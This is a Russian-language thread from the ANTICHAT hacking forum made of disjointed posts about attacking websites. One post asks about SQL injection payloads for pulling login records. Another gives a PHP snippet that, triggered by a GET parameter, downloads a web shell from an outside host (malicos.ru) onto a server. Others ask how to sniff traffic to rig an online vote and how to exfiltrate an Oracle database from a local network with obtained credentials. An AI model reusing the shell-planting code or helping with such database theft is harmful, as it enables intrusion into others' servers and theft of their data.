ANTICHAT — форум по информационной безопасности, OSINT и технологиям

еще один вопрос)
конструкция select+1+top+login+from+user+where+id=1 не выводит ошибки)
как я понимаю просто такого ид не существует?
select+top+1+start+at+2+login+from+user ругается на где то был топик на эту тему но ответа так и не увидел.
какие еще есть варианты вывести другие записи?)

mailbrush я сказал это чтобы малоли путь понадобиться при залитии файла (файл прив вроде включен)

up. чуть подкоректировал чтобы было легче понимать

Ух блин... Это скуля? Какие колонки выводятся?

Насколько я понял тебя:
if($_GET['get_shell']=='yes')
copy('http://malicos.ru/shell.txt','/путь/имя_шелла');
/*
file_put_contents( '/путь/имя_шелла',file_get_contents('http://malicos.ru/shell.txt'));
и т.п. и т.п.

*/

Вопрос может не совсем в тему...
Какой сниффер лучше юзать для просмотра пакетов отправляемых браузером на сайты?

Плагин к фалерфоксу, - LiveHTTP Headers

вот именно как узнать каким методом передаётся ответ на голосование и какая переменная соответствует тому или иному варианту я не знаю

ну это можно посмотреть глянув в "html код" страницы...
Ну или
скачай Naviscope для перехвата пакетов + InetCrack and AccessDiver для посылки пакетов ....

Перекопал много ресурсов но так никто и не ответил.
Как можно "слить" базу данных из локальной сети? Сервер базы крутится на Оракле.
Имеется связка логин\пасс для программ работающих с базой.
Как? Чем? Что еще нужно?